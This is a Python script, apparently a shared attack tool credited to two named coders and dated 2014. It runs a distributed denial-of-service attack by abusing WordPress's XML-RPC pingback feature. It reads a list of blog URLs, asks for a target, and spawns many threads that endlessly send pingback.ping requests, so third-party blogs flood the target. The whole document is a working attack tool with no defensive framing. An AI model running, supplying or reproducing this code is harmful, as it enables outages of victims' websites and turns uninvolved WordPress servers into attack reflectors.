XMLRPC DDoS WordPress PingBack API Remote Exploit

1. import sys, socket, threading, time, os
2.  
3. Lock = threading.Lock()
4. N = 0
5. class PingBack(threading.Thread):
6.     blog = None
7.    
8.     def __init__(self, url, number, lista):
9.         threading.Thread.__init__(self)
10.         self.url = url
11.         self.number = number
12.         self.lista = lista
13.         self.blog = None
14.        
15.     def run(self):
16.         global N
17.         Lock.acquire()
18.         print ("Starting thread #%3d" % self.number)
19.         Lock.release()
20.         time.sleep(2)
21.         while True:
22.             self.blog = self.lista[N]
23.             N += 1
24.             if N > (len(self.lista) - 1):
25.                 N = 0
26.            
27.             try:
28.                 function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>" % (self.url, self.blog)
29.                 request_lenght = len(function_pingback)
30.                 self.blog_cleaned = self.blog.split("?p=")[0]
31.                 self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
32.                 request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n" % (self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
33.              
34.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
35.                 s.connect((self.blog_cleaned1, 80))
36.                 s.send(request.encode())
37.                 print ("Thread %3d | %2d | Blog %s" % (self.number, N, self.blog_cleaned1))
38.             except:
39.                 print ("Thread %3d | %2d | Connection refused!!" % (self.number, N))
40.  
41. def title():
42.     os.system("title ...:: XMLRPC PingBack DDoS ::... ")
43.     os.system("color a")
44.     print ("""-------------------------------------------------------------------------\n
45. \tXML-RPC PingBack API Remote DDoS
46. \tDate : 20/04/2014
47. \tPython 3.3.3
48. \tPython version coded by : Xordas94 && Sikh887\n
49. --------------------------------------------------------------------------\n\n""")
50.  
51.    
52. def main():
53.     title()
54.     try:
55.         in_file = open("list.txt", "r")
56.         lista = []
57.         for i in in_file:
58.             lista.append(i)
59.     except:
60.         print ("I can't find list.txt. To run the program you need it")
61.         os.system("pause")
62.         sys.exit(0)
63.     num_thread = int(input("Number of thread: "))
64.     url = str(input("Target: "))
65.     print("\n###############################################")
66.     for i in range(num_thread):
67.         PingBack(url, i+1, lista).start()
68.     print("###############################################\n")
69.  
70. if __name__ == "__main__":
71.     main()